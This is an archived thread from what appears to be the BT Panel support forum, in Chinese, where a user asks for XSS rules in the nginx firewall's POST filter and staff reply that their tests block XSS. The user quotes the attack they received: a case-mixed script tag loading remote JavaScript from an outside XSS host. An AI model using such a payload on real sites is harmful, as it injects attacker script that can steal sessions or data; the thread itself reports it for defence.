【待反馈】目前nginx防火墙中，post过滤没有xss过滤规则，...

宝塔用户_fcgtve 发表于 2023-4-12 16:48:42

目前nginx防火墙中，post过滤没有xss过滤规则，希望添加上，尽快更新，刚被xss了，上攻击的内容<a href=/xsssafe/>Holle<sCRiPt sRC=//xss.yt/I9Kc></sCrIpT>

谢花郎 发表于 2023-4-13 10:11:50

感谢反馈，这边确认下，有结果回复您

谢花郎 发表于 2023-4-13 10:28:43

您好，这边测试XSS是可以正常被防火墙拦截的，您那边如有具体复现方式的话，可提供下视频。
或者是重新修复下防火墙插件看看

页: [1]

宝塔面板论坛's Archiver